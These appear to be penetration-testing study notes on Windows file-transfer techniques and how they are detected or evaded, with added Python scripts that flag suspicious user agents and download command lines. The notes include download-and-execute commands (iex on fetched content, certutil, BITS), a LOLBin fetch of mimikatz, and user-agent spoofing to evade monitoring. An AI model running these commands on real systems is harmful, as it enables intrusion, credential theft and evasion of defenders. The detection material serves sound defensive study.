Detection And Evasion
Detection Overview
Detection relies on identifying malicious actions through command-line patterns and user agent strings. While blacklisting commands is easy to bypass, whitelisting is more robust but requires initial setup to allow only legitimate commands.
User Agent String Analysis
User agents identify HTTP clients (e.g., browsers, tools like curl, sqlmap, or scripts). Organizations can build a list of known legitimate user agents (e.g., for browsers, system updates, antivirus) and use SIEM tools to detect anomalies and investigate suspicious agents.
- Legitimate Traffic: Filter common user agents like Firefox, Chrome, Windows Update, etc.
- Suspicious Activity: Investigate unknown or rare user agents for potential malicious actions.
HTTP Transfer Techniques
PowerShell (Invoke-WebRequest, Invoke-RestMethod):
Client Command:
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Server User-Agent:
Mozilla/5.0 WindowsPowerShell/5.1.14393.0
WinHttpRequest:
Client Command:
$h=new-object -com WinHttp.WinHttpRequest.5.1; $h.open('GET','http://10.10.10.32/nc.exe',$false); $h.send(); iex $h.ResponseText
Server User-Agent:
Mozilla/4.0 (compatible; WinHttp.WinHttpRequest.5)
Msxml2:
Client Command:
$h=New-Object -ComObject Msxml2.XMLHTTP; $h.open('GET','http://10.10.10.32/nc.exe',$false); $h.send(); iex $h.responseText
Server User-Agent:
Mozilla/4.0 (compatible; MSIE 7.0; Trident/7.0; .NET4.0C)
Certutil:
Client Command:
certutil -urlcache -split -f http://10.10.10.32/nc.exe
Server User-Agent:
Microsoft-CryptoAPI/10.0
BITS (Background Intelligent Transfer Service):
Client Command:
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t; $r=gc $env:temp\t; rm $env:temp\t; iex $r
Server User-Agent:
Microsoft BITS/7.8
What are LOLBins and GTFOBins?
LOLBins (Living Off the Land Binaries):
Legitimate, pre-installed system binaries on Windows that attackers or penetration testers can repurpose to perform unintended tasks (like downloading files, executing commands, or escalating privileges).
GTFOBins:
The Linux equivalent of LOLBins, these are standard binaries often included in Linux distributions that can be exploited for similar purposes.
In short, LOLBins and GTFOBins let you leverage the target system’s trusted tools to achieve your goals (like file transfers) without introducing foreign artifacts or triggering security alerts.
Detection and Prevention
- Whitelist or Blacklist Binaries: Whitelist allowed binaries and block known malicious ones.
- Monitor User Agent Strings: Anomalous strings like Microsoft BITS/7.8 or WinHttp.WinHttpRequest.5 can indicate malicious activity.
- Use SIEM for Analysis: Feed legitimate user agents into a SIEM and flag unknown ones for threat hunting.
Evading Detection: Key Concepts
Changing User Agents
- Administrators may blacklist default PowerShell user agents, but Invoke-WebRequest allows customization using the -UserAgent parameter.
- You can mimic popular browsers like Chrome or Firefox to make requests appear legitimate.
Example: Using a Chrome User Agent
Set the user agent to Chrome:
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Perform the download:
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
Netcat session output shows the forged user agent.
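The following is an added example (not part of the original notes) that applies the user agent triage described under "Detection and Prevention" to web server access logs, and shows the gap that the "Changing User Agents" section above exploits. It is a plain Python script with no SIEM dependency; the allowlist patterns, the combined-log-format parser and the sample log lines are all constructed here. The tool signatures are the user agent strings listed in the "HTTP Transfer Techniques" section, the server address 10.10.10.32 is the one used throughout the notes, and the client address 10.10.10.50 is invented.

```python
import re
from collections import Counter

# Allowlist of user agents treated as legitimate (constructed for this example;
# a real baseline is built from the organisation's own traffic). The notes name
# Firefox and Chrome as common legitimate agents, so those are the two patterns.
ALLOWED_USER_AGENTS = [
    re.compile(r"^Mozilla/5\.0 \([^)]*\) AppleWebKit/\S+ \(KHTML, like Gecko\) Chrome/\S+ Safari/\S+$"),
    re.compile(r"^Mozilla/5\.0 \([^)]*\) Gecko/\d+ Firefox/[\d.]+$"),
]

# Substrings of the user agents listed for each transfer technique in the notes,
# mapped to the client that produces them.
TOOL_USER_AGENTS = {
    "WindowsPowerShell/": "PowerShell Invoke-WebRequest / Invoke-RestMethod",
    "WinHttp.WinHttpRequest": "WinHttp.WinHttpRequest COM object",
    "Microsoft-CryptoAPI/": "certutil -urlcache",
    "Microsoft BITS/": "BITS (Start-BitsTransfer)",
    # Msxml2.XMLHTTP reports a legacy IE string; old IE-based clients send the
    # same string, so treat this one as a lead to investigate rather than proof.
    "MSIE 7.0; Trident/7.0; .NET4.0C": "Msxml2.XMLHTTP COM object",
}

# Requests for these file types deserve a look even when the user agent is allowlisted.
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".ps1", ".bat")

# Apache/nginx "combined" log format: the user agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log. The last line is a download of nc.exe with a
# browser-like user agent, i.e. the spoofing the notes describe.
SAMPLE_LOG = [
    '10.10.10.50 - - [12/Mar/2024:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"',
    '10.10.10.50 - - [12/Mar/2024:09:15:10 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" '
    '"Mozilla/5.0 WindowsPowerShell/5.1.14393.0"',
    '10.10.10.50 - - [12/Mar/2024:09:16:41 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft BITS/7.8"',
    '10.10.10.50 - - [12/Mar/2024:09:17:03 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "Microsoft-CryptoAPI/10.0"',
    '10.10.10.50 - - [12/Mar/2024:09:18:22 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" '
    '"Mozilla/4.0 (compatible; WinHttp.WinHttpRequest.5)"',
    '10.10.10.50 - - [12/Mar/2024:09:19:07 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Trident/7.0; .NET4.0C)"',
    '10.10.10.50 - - [12/Mar/2024:09:20:55 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/8.4.0"',
    '10.10.10.50 - - [12/Mar/2024:09:22:18 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"',
]


def classify_user_agent(ua):
    """Return (verdict, tool) where verdict is 'tool', 'allowed' or 'unknown'."""
    # Known tool signatures are checked first so a loose allowlist pattern can
    # never hide a known transfer client.
    for needle, label in TOOL_USER_AGENTS.items():
        if needle in ua:
            return "tool", label
    for pattern in ALLOWED_USER_AGENTS:
        if pattern.search(ua):
            return "allowed", None
    return "unknown", None


def triage(log_lines):
    """Parse combined-format lines and classify each request by its user agent."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined log format; skip rather than guess
        ua, path = m.group("ua"), m.group("path")
        verdict, tool = classify_user_agent(ua)
        findings.append({
            "client": m.group("ip"),
            "path": path,
            "user_agent": ua,
            "verdict": verdict,
            "tool": tool,
            # A spoofed browser agent still fetches an executable; this flag keeps
            # such requests visible even though the user agent check passes.
            "executable": path.lower().endswith(EXECUTABLE_SUFFIXES),
        })
    return findings


def summarize(findings):
    """Count requests per verdict, the figure a SIEM dashboard would show."""
    return Counter(f["verdict"] for f in findings)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        flag = " [executable download]" if f["executable"] else ""
        print(f"{f['verdict']:<8} {f['client']} {f['path']:<12} {f['tool'] or f['user_agent']}{flag}")
    print(summarize(results))
```

Run as a script it prints one line per request and the verdict counts. The last sample line is the point of the exercise: its user agent passes the allowlist, so user agent analysis alone rates it "allowed"; only the executable-download flag (or host telemetry showing which process opened the connection) keeps it on the analyst's list.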
Using LOLBins for File Transfers
- Application whitelisting may block tools like PowerShell or Netcat.
- Living Off the Land Binaries (LOLBins) can be used to bypass restrictions.
Example: Intel GfxDownloadWrapper.exe
- Some systems have Intel's GfxDownloadWrapper.exe, which can download files:
GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
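The notes open by saying detection also relies on command-line patterns, and this section shows why an application allowlist alone is not enough once a LOLBin is involved. The following is an added example (not part of the original notes) that evaluates process-creation events against both controls: an allowlist of permitted images, and patterns for the download commands listed in these notes. The event records are constructed; their field names loosely follow Sysmon's process-creation event (Image, CommandLine). The certutil and powershell.exe paths are the standard Windows locations, the GfxDownloadWrapper.exe path is a placeholder, and the allowlist contents are an assumption for the example.

```python
import re

# Application allowlist (constructed): images permitted to run on this host.
# Whitelisting is the more robust control from the notes; lower-cased paths
# are compared so casing in the event does not matter.
ALLOWED_IMAGES = {
    r"c:\windows\system32\certutil.exe",
    r"c:\windows\system32\windowspowershell\v1.0\powershell.exe",
}

# Command-line patterns for the transfer techniques shown in these notes.
# Each requires a URL where the tool takes one, so ordinary uses of the same
# binary (e.g. certutil -hashfile) do not match.
DOWNLOAD_PATTERNS = [
    ("certutil URL cache download",
     re.compile(r"\bcertutil(?:\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    ("PowerShell Invoke-WebRequest / Invoke-RestMethod download",
     re.compile(r"Invoke-(?:WebRequest|RestMethod)\b.*https?://", re.I)),
    ("BITS transfer", re.compile(r"Start-BitsTransfer\b.*https?://", re.I)),
    ("WinHttp.WinHttpRequest COM object", re.compile(r"WinHttp\.WinHttpRequest", re.I)),
    ("Msxml2.XMLHTTP COM object", re.compile(r"Msxml2\.XMLHTTP", re.I)),
    ("GfxDownloadWrapper.exe download", re.compile(r"GfxDownloadWrapper\.exe\b.*https?://", re.I)),
]

# Evasion indicator from the "Changing User Agents" section: an explicit
# -UserAgent argument or the PSUserAgent enum on a download command line.
USER_AGENT_OVERRIDE = re.compile(r"-UserAgent\b|PSUserAgent", re.I)

# Constructed process-creation events. Event 2 and 4 are benign uses of the
# same binaries and should produce no findings.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe Invoke-WebRequest http://10.10.10.32/nc.exe '
                     r'-UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil -urlcache -split -f http://10.10.10.32/nc.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -hashfile C:\Windows\System32\notepad.exe SHA256"},
    {"image": r"C:\PLACEHOLDER_PATH\GfxDownloadWrapper.exe",  # real location not given in the notes
     "command_line": r'GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe Get-ChildItem C:\Users"},
]


def evaluate(event, allowed_images=ALLOWED_IMAGES):
    """Return the list of reasons this event merits attention (empty if none)."""
    reasons = []
    # Control 1: application allowlist. A LOLBin that is not on the list is
    # reported regardless of what it was asked to do.
    if event["image"].lower() not in allowed_images:
        reasons.append("image not on application allowlist")
    # Control 2: command-line patterns. Catches allowlisted binaries that are
    # being repurposed for downloads.
    cmd = event["command_line"]
    for name, pattern in DOWNLOAD_PATTERNS:
        if pattern.search(cmd):
            reasons.append(f"download pattern: {name}")
    # A custom user agent is only interesting when paired with a download.
    if USER_AGENT_OVERRIDE.search(cmd) and any(r.startswith("download pattern") for r in reasons):
        reasons.append("custom user agent on a download command")
    return reasons


def scan(events, allowed_images=ALLOWED_IMAGES):
    """Evaluate every event; return (index, reasons) for those with findings."""
    hits = []
    for i, event in enumerate(events):
        reasons = evaluate(event, allowed_images)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}: {SAMPLE_EVENTS[index]['command_line']}")
        for reason in reasons:
            print(f"    - {reason}")
```

The two controls complement each other: the allowlist catches GfxDownloadWrapper.exe because it is not a permitted image, while the command-line patterns catch certutil and PowerShell, which are permitted images being used as downloaders. The benign certutil -hashfile and Get-ChildItem events produce nothing, which is the precision a denylist of bare binary names would lose.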
Additional Resources
- LOLBAS: Find Windows binaries that can perform file downloads.
- GTFOBins: Locate Linux binaries with similar capabilities.